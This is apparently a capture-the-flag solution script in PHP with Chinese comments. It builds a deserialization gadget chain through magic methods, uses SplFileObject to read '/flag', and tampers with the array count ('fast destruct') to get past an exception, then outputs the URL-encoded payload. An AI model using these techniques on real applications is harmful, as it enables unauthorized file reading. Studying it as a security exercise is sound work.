<?php // 定义类结构,用于序列化 class Sun { public $sun; } class Moon { public $nearside; } class Earth { public $onearth; public $inearth; public $outofearth; } class Solar { public $Mercury; public $Venus; public $Mars; public $Jupiter; public $Saturn; } $sun = new Sun(); $moon = new Moon(); $earth = new Earth(); $solarA = new Solar(); // 触发 __set 的对象 $solarB = new Solar(); // 触发 __call 的对象 // 1. 串联链条 $sun->sun = $moon; // Sun::__destruct -> Moon::__tostring $moon->nearside = $earth; // Moon::__tostring -> Earth::__invoke // 2. 核心跳转:Earth -> SolarA::__set $earth->onearth = $solarA; $earth->inearth = "Mars"; // 触发 __set 的 $name $earth->outofearth = "/flag"; // 赋给 $solarA->Mars,即 __call 的参数 $args[0] // 3. 核心爆发:SolarA::__set -> SolarB::__call $solarA->Mercury = $solarB; $solarA->Venus = "SplFileObject"; // 关键!赋给 $func,即 new SplFileObject // 4. 原生类执行:SolarB::__call $solarB->Jupiter = "current"; // SplFileObject 读取内容的方法 $solarB->Saturn = ""; // 方法参数 // 5. 生成绕过 Exception 的 Payload $payload = array($sun); $ser = serialize($payload); // 通过修改数组元素数量,触发 Fast Destruct 绕过 throw new Exception $final_payload = str_replace('a:1:{i:0;', 'a:2:{i:0;', $ser); echo "Final URL Encoded Payload:\n\n"; echo urlencode($final_payload); ?>
You have javascript disabled. You will not be able to edit any code.